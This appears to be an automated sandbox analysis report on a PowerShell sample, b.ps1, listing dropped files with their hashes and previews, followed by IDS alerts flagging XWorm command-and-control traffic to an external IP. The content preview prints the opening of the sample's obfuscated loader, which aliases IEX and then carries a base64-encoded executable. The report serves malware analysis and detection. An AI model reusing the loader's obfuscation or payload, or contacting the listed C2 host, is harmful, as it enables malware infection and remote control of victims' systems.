                                      SSDEEP:96:8B2FajaIhrxYid6zRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAfFf/VXTT:3yaIhmG6zR30mYAzuiFtZ24lO8
                                      MD5:FEDF4338E94A280DF54F3D727CD7FAD0
                                      SHA1:825D6A39B56FC46507230088622C81B3978E93F1
                                      SHA-256:5C2BA8ED78B235D841143ACC9F339D357ABCDFE6C03E7E3761007F8AA083FB1B
                                      SHA-512:F5EA95DC6E241E5D1C86F101760EAC1E1849C988B2644243B35FB6AFB4819F16058CC18A87066CF457823B9572FD3790AC5D18F1FD302220EAF821C4C065D7EC
                                      Malicious:false
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.3.5.7.7.1.8.0.8.0.2.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.3.5.7.6.5.2.5.1.1.1.6.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.a.4.c.a.8.b.-.3.3.e.4.-.4.7.5.b.-.8.4.8.2.-.0.e.9.6.7.6.9.8.7.0.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.4.-.0.0.0.1.-.0.0.1.4.-.9.9.5.f.-.7.1.7.3.d.5.6.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                      Process:C:\Windows\System32\wermgr.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):7288
                                      Entropy (8bit):3.731107745118637
                                      Encrypted:false
                                      SSDEEP:96:RSIU6o7wVetbrpQjW6YEc7ariyM6gmfHNpXEr/BA5aMANm:R6l7wVeJrp/6YEIariypgmftECpANm
                                      MD5:76513552889CE39896431C583A62D1E2
                                      SHA1:A172FB40B67B7F0CC5113AB0416B201862964C05
                                      SHA-256:D5CAFCAC03DDA2E1E72B5FA77148D0519CD230FC4EFFAE8527A028E4A3A32A17
                                      SHA-512:4BC9D5A403396EF3BBB400B3ECF54840D36076FB99B815E145032468A3B8AC8C54148B54F63D0B28CD82B48902F58A94CC6C23281042667DC14E8196BD9B195D
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.1.6.<./.P.i.
                                      Process:C:\Windows\System32\wermgr.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4905
                                      Entropy (8bit):4.692638124385983
                                      Encrypted:false
                                      SSDEEP:96:uIjf0I7OCa7VBJFKloFMMFh+pjWTzFMMFgufnd:uIIYOj7h45Coufd
                                      MD5:D751F58A10422CCFF75C786CA27AA9CD
                                      SHA1:509CAFC55A43ED49F36F1565F2A22D218BDC00BD
                                      SHA-256:4D593C2AC31AB669904EC4BFE57317F2858C23182E0B61E6363453DDC49FC494
                                      SHA-512:D8708CFDE51B0E605BC71EBDC383B0DD2679590ED8294DB7F18587B080C48201C2E6A90904E74AF084BEDA72AF7C01005DB510799595E6F1395D6DEE84901D1B
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="692676" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Sun Jan 26 09:37:44 2025, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):330087
                                      Entropy (8bit):3.5427843741165983
                                      Encrypted:false
                                      SSDEEP:6144:brXZw4jvGjVdQTgG6atJRAyR2GlvSQj4SqY:brtvG8TioU5S9
                                      MD5:7004B2F7C7D7743CA692AC3024B352DC
                                      SHA1:19B9319DCB490318CAE2F54AD1E5A20FF8E26B9E
                                      SHA-256:9F170C35280D1B63C299AEBF24B5ABBD48E01D7C892FC56CB389EB5629F0700D
                                      SHA-512:2B39D36062C4BE8726D59E9C4BEBA2570606E9733AB0597D328931B0D4A0A33C91461588CE96816C10F734241B83A3D55197F6477F3D8ED7C4A176F95165D50C
                                      Malicious:false
                                      Reputation:low
                                      Preview:MDMP..a..... .......h..g........................ ...........$...8'.......&..(b..........`.......8...........T...........0?..7...........\'..........H)..............................................................................eJ.......)......GenuineIntel............T..............g....z........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8356
                                      Entropy (8bit):3.68818233754692
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJ5b6g8Q6YxGvSkQgmfZ4Aprk89b3GsfgH39m:R6lXJV6gj6Y2S7gmfSs3lfgQ
                                      MD5:09A9BB87F5C9A9B9292F864545B6AB61
                                      SHA1:C790622211946D363A0EA7527E8281B35CB811F7
                                      SHA-256:E15CEE739696E94B48C32E096740A18FDA88E33427749BAA1B12CBDDE6FDB2A1
                                      SHA-512:9AF2604C9602876914EEF80F8A8B78A467D8D0731570E10CA0DB094716035A5896B376934EBE5A20BEB6E47A4EB385414F20293BA829BC8F3D8695DA046A207C
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.8.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4726
                                      Entropy (8bit):4.442737188860243
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsLJg77aI9FCrWpW8VYBYm8M4J+VFo+q8v5kmDIDd:uIjflI7vCa7VZJ/KSmDIDd
                                      MD5:3A3AAFAC7F6E0647CEAEF017769F7FC6
                                      SHA1:C57B29A01101B2088D4CF8B631B9546FF79CCFFE
                                      SHA-256:676E87C60B56AC054632732E9CBDCE728C155F30E88D1C9CD875CAB1AC01764D
                                      SHA-512:8149154B9551FE8C33374335FA454BEDDE1503125B74BA84CEF24A7BC2C7F6E442F71C927EC2E29A69195980A186558D380FF1B099D723CEDE0EC57A0E09F97F
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="692680" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):11608
                                      Entropy (8bit):4.890472898059848
                                      Encrypted:false
                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                      Malicious:false
                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:NlllulJnp/p:NllU
                                      MD5:BC6DB77EB243BF62DC31267706650173
                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                      Malicious:false
                                      Preview:@...e.................................X..............@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6222
                                      Entropy (8bit):3.694767108166484
                                      Encrypted:false
                                      SSDEEP:96:smkCUohGkvhkvCCtRHYkTZdH+HYkTZCFHR:smgjRHYkWHYkO
                                      MD5:E09E8E4F52892C518EAEDF3035CDF08E
                                      SHA1:25927B618B9DFCFE71114919D9DDA355282D46AE
                                      SHA-256:7442DE644641FB92CCE879EF2FA52A8024F45394042B881C4A53C7DB9E556529
                                      SHA-512:974B8F2D443321242BB132E876A6EB812BE562F72DC8D6C886DDC739DDC325AB4387B65142D81DAECCF0A95C7553EAB8B2914B990214261FEE0278EF09EE08CF
                                      Malicious:false
                                      Preview:...................................FL..................F.".. ...d........s.o..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........n.o...o.s.o......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl:Z=L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....:ZAL..Roaming.@......DWSl:ZAL....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl:Z=L....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW"r..Windows.@......DWSl:Z=L....E......................G..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl:Z=L....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl:Z=L....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl:ZEL....q...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6222
                                      Entropy (8bit):3.694767108166484
                                      Encrypted:false
                                      SSDEEP:96:smkCUohGkvhkvCCtRHYkTZdH+HYkTZCFHR:smgjRHYkWHYkO
                                      MD5:E09E8E4F52892C518EAEDF3035CDF08E
                                      SHA1:25927B618B9DFCFE71114919D9DDA355282D46AE
                                      SHA-256:7442DE644641FB92CCE879EF2FA52A8024F45394042B881C4A53C7DB9E556529
                                      SHA-512:974B8F2D443321242BB132E876A6EB812BE562F72DC8D6C886DDC739DDC325AB4387B65142D81DAECCF0A95C7553EAB8B2914B990214261FEE0278EF09EE08CF
                                      Malicious:false
                                      Preview:...................................FL..................F.".. ...d........s.o..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........n.o...o.s.o......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl:Z=L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....:ZAL..Roaming.@......DWSl:ZAL....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl:Z=L....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW"r..Windows.@......DWSl:Z=L....E......................G..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl:Z=L....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl:Z=L....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl:ZEL....q...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.425858083576356
                                      Encrypted:false
                                      SSDEEP:6144:4Svfpi6ceLP/9skLmb0OTlWSPHaJG8nAgeMZMMhA2fX4WABlEnNX0uhiTw:DvloTlW+EZMM6DFy103w
                                      MD5:5C62D2A5872D1008568312556F88F772
                                      SHA1:5971CC9F1AAAB81B284C5F5E945F7527273FFD38
                                      SHA-256:D771BA9B6410D4183099D9CDC4AB33FDFD74D0E110AF4F47024E3D02E89F3900
                                      SHA-512:D2FC6314530860521EAEB3D17BE7C6EC9F690D13569B4E15166DB059F401098CDA3793DA5EAD10219E6CAEAF9E67CB7D042B62E8310E05ECB748C16559358919
                                      Malicious:false
                                      Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ5.u.o..............................................................................................................................................................................................................................................................................................................................................)..A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:ASCII text, with very long lines (65481), with CRLF line terminators
                                      Entropy (8bit):5.2108360392533335
                                      TrID:
                                        File name:b.ps1
                                        File size:185'580 bytes
                                        MD5:b5008db49b4ac5e668451b9a34ce2b76
                                        SHA1:820ebe8c35bf4c57e1e439e4b10cee8186c444d3
                                        SHA256:7367d1b56aca0b585cef8466d8d9a83dac03f0e6d81f9e89567c10a2cc44a4bc
                                        SHA512:43e8929ec5f728ee53f9a2b378f1949a789ac1e0a92fea559541444b39a3ca8da9911751bda6d37d30831f60af8b0356c4294b695de303cdd076c7c9b550c754
                                        SSDEEP:3072:ZcUKZ20H5qt7ABLmYOlba6c5GdOa7MQrq3v0ayW3sfc4xDAmMz/zlZVdtj0QGTgn:ZcB20H5qt7ABLmYOlba6c5GdOa7MQrq/
                                        TLSH:CA047C321102BC8E9F7F3E48A5042D911CDC3877AB69C158FAC60AAD75EA650DF39DB4
                                        File Content Preview:.... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA
                                        Icon Hash:3270d6baae77db44

                                        Download Network PCAP: filteredfull

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2025-01-26T10:34:28.544276+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:34:28.769948+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:34:28.814226+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:34:36.918088+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:34:36.918088+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:34:40.555436+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:34:40.558655+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:34:52.350845+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:34:52.357325+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:04.163753+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:04.166179+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:06.917867+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:15.963703+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:15.967787+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:25.653662+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:25.655476+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:25.854717+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:25.864086+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:26.619507+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:26.643517+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:31.488042+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:31.490610+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:31.901153+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:31.946435+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:36.906588+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:41.125293+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:41.127120+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:52.921008+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:52.923666+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:35:56.558294+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:35:56.564382+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:03.438235+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:03.442442+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:03.562563+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:03.564213+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:03.688443+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:03.689951+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:03.811883+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:03.820321+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:03.934237+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
